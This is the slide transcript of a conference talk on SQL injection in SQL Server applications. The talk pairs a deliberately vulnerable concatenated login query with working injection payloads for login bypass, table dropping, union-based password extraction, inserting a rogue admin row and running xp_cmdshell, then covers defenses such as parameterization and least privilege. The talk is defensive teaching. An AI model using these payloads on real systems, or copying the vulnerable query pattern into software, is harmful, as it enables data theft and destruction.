SQL Injection
session at SQLSaturday #199 (Sofia, Bulgaria)

    SQL Injection: Presentation Transcript

    • SQL Injection – are you ready for defense? Andrey Korshikov, Krasnodar, Russia. PASS Regional Mentor for Central Eastern Europe. MVP, MCT, MCSE, MCITP, MCPD, MCSD .NET, MCDBA, MOS
    • Sponsors
    • About me: Andrey Korshikov, korshikov@sqlpass.org, @AndreyKorshikov, PASS Regional Mentor for Central Eastern Europe
    • About me
    • Agenda
      - Problem
      - Attack
      - Defense
    • Statistics
      - In February 2002, Jeremiah Jacks discovered that Guess.com was vulnerable to an SQL injection attack, permitting anyone able to construct a properly crafted URL to pull down 200,000+ names, credit card numbers and expiration dates from the site's customer database.
      - On November 1, 2005, a teenage hacker used SQL Injection to break into the site of a Taiwanese information security magazine from the Tech Target group and steal customers' information.
      - On March 29, 2006, a hacker discovered an SQL Injection flaw in an official Indian government tourism site.
      - On June 29, 2007, a computer criminal defaced the Microsoft UK website using SQL Injection. The UK website The Register quoted a Microsoft spokesperson acknowledging the problem.
      - In January 2008, tens of thousands of PCs were infected by an automated SQL Injection attack that exploited a vulnerability in application code that uses Microsoft SQL Server as the database store.
    • Statistics
      - …
      - In May 2012, the website for Wurm Online, a massively multiplayer online game, was shut down because of an SQL Injection while the site was being updated.
      - In July 2012 a hacker group was reported to have stolen 450,000 login credentials from Yahoo!. The logins were stored in plain text and were allegedly taken from a Yahoo subdomain, Yahoo! Voices. The group breached Yahoo's security by using a "union-based SQL Injection technique".
      - In February 2013, a group of Maldivian hackers hacked the website "UN-Maldives" using SQL Injection.
    • SQL Injection
      One package of milk for 30 rubles:
        SELECT TOP 1 productname FROM shop WHERE (type='milk' AND price='30')
    • SQL Injection
      One package of milk for 30 rubles, or one kilogram of sweets for 200 rubles:
        SELECT TOP 1 productname FROM shop WHERE (type='milk' AND price='30') OR (type='sweets' AND price='200')
    • Warning! I recommend using the knowledge from my session only for training.
    • Dangers of SQL Injection  It is easy to study and apply  Archives of solutions http://www.exploit-db.com/  Can be automatized  Many script examples in the Network are vulnerable for attack  Does harm to the most valuable – a database
    • Dangers of SQL Injection  http://www.exploit-db.com/
    • Technical implementations
      - Incorrectly filtered escape characters
      - Incorrect type handling
      - Use of UNION
      - Blind SQL injection
    • Source data
        create table users(
            id int,
            username varchar(255),
            password varchar(255),
            privs int
        )
        go
        insert into users values
            ( 0, 'admin', 'r00t', 0xffff ),
            ( 1, 'guest', 'guest', 0x0000 )
    • Application
        // the two text box values are concatenated straight into the query text
        SqlCommand comm = new SqlCommand("select * from users where username = '" +
            txtUserName.Text + "' and password = '" + txtPassword.Text + "'");
    • Demo
    • Application
      Input: '; drop table users--
        SqlCommand comm = new SqlCommand("select * from users where username = '" +
            txtUserName.Text + "' and password = '" + txtPassword.Text + "'");
    • Getting data
      - Username: '; drop table temp--
      - Username: admin'--
      - Username: ' or 1=1--
      - Username: ' union select 1, 'fictional_user', 'some_password', 1--
    • Getting data
      - table name:
        ' having 1=1--
      - column names:
        ' group by users.id having 1=1 --
        ' group by users.id, users.username, users.password, users.privs having 1=1--
      - type of data:
        ' union select sum(username) from users--
        ' union select sum(id) from users--
    • Getting data
      - add a new row:
        '; insert into users values( 666, 'attacker', 'foobar', 0xffff )--
      - info about the system:
        ' union select @@version,1,1,1 --
      - logins:
        ' union select min(username),1,1,1 from users where username > 'a'--
      - passwords:
        ' union select password,1,1,1 from users where username = 'admin'--
    • Extended stored procedures
        exec master..xp_cmdshell 'net1 user'
      xp_regaddmultistring, xp_regdeletekey, xp_regdeletevalue, xp_regenumkeys, xp_regenumvalues, xp_regread, xp_regremovemultistring, xp_regwrite, xp_servicecontrol, xp_availablemedia, xp_dirtree, xp_enumdsn, xp_loginconfig, xp_makecab, xp_ntsec_enumdomains, xp_terminate_process
    • Demo
    • WinForms
    • Demo
    • Parameters in URL
    • Defense
    • Defense  Tell to the user only that he/she really needs to know try { // Attempt some database operation } catch(Exception e) { errorLabel.Text = string.Concat("Sorry, your request failed. ", "If the problem persists please report the following message ", "to technical support", Environment.Newline, e.Message); } try { // Attempt some database operation } catch(Exception e) { int id = ErrorLogger.LogException(e); errorLabel.Text = string.Format("Sorry, your request Failed. If the problem persists please report error code {0} to the technical support team.", id); }
    • Defense  Check of all entered data  size  content of string variables  using XML-schema  decline symbols ; ' -- /* */ xp_  Use stored procedures
    • Defense  Use the parameterized input with stored procedures SqlDataAdapter myCommand = new SqlDataAdapter("LoginStoredProcedure '" + Login.Text + "'", conn);
    • Defense  Use SQL parameters of safe types SqlDataAdapter myCommand = new SqlDataAdapter("AuthorLogin", conn); myCommand.SelectCommand.CommandType = CommandType.StoredProcedure; SqlParameter parm = myCommand.SelectCommand.Parameters.Add("@ au_id", SqlDbType.VarChar, 11); parm.Value = Login.Text;
    • Defense  Pack parameters by functions QUOTENAME() and REPLACE() --before: SET @temp = 'select * from authors where au_lname=''' + @au_lname + '''‘ --after: SET @temp = 'select * from authors where au_lname=''' + REPLACE(@au_lname,'''','''''') + ''''
    • Defense  Execute with least privilege <add key="cnxNWindBad" value="server=localhost;uid=sa;pwd=;da tabase=northwind;" /> <add key="cnxNWindGood" value="server=localhost;uid=NWindReade r;pwd=utbbeesozg4d; database=northwind;" />
    • Defense  Secrets must be secrets <add key="cnxNWindBest" value="AQAAANCMnd8BFdERjHoAwE/ Cl+sBAAAAcWMZ8XhPz0O8jHcS1539LAQAAAACAAAA AAADZgAAqAAAABAAAABdodw0YhWfcC6+ UjUUOiMwAAAAAASAAACgAAAAEAAAALPzjTRnAPt7/ W8v38ikHL5IAAAAzctRyEcHxWkzxeqbq/ V9ogaSqS4UxvKC9zmrXUoJ9mwrNZ/ XZ9LgbfcDXIIAXm2DLRCGRHMtrZrp9yledz0n9kgP 3b3s+ X8wFAAAANmLu0UfOJdTc4WjlQQgmZElY7Z8" />
    • Defense  Secrets must be secrets string strCnx = SecureConnection.GetCnxString("cnxNWindBest"); public class SecureConnection { static public string GetCnxString(string configKey) { string strCnx; try { // get encrypted string from web.config string strEncryptedCnx = ConfigurationSettings.AppSettings[configKey]; // decrypt string DataProtector dp = new DataProtector(DataProtector.Store.USE_MACHINE_STORE); byte[] dataToDecrypt = Convert.FromBase64String(strEncryptedCnx); strCnx = Encoding.ASCII.GetString(dp.Decrypt(dataToDecrypt,null)); } catch { strCnx=""; } return strCnx; } } *Win32 Data Protection API (DPAPI) (System.Security.Cryptography)
    • Defense  Secrets must be secrets  EncryptByPassPhrase  DecryptByPassPhrase DECLARE @plaintext nvarchar(1000), @enc_text varbinary(2000) SET @plaintext='Я помню чудное мгновенье' SET @enc_text=ENCRYPTBYPASSPHRASE('Krasnodar',@plaintext) SELECT 'Оригинальный текст: ', @plaintext SELECT 'Зашифрованный текст:', @enc_text SELECT 'Расшифровка:', CAST(DECRYPTBYPASSPHRASE('Krasnodar',@enc_text) as nvarchar(1000))
    • Demo
    • Defense on all layers
    • Defense (conclusion)
      - Tell the user only what he really needs to know
      - Check all entered data
      - Use stored procedures
      - Use SQL parameters of safe types
      - Pack parameters with the functions QUOTENAME() and REPLACE()
      - Execute with least privilege
      - Secrets must be secrets
      - Defense on all layers
    • :) http://xkcd.com/327/
    • Resources
      - SQL Injection
      - SQL Injection FAQ
      - Hacking website using SQL Injection - step by step guide
      - Dynamic SQL & SQL injection
      - Advanced SQL Injection In SQL Server Applications
      - Stop SQL Injection Attacks Before They Stop You
      - SQL Injection - Why I Don't Think Parameterization is Enough
    • Questions
    • Sponsors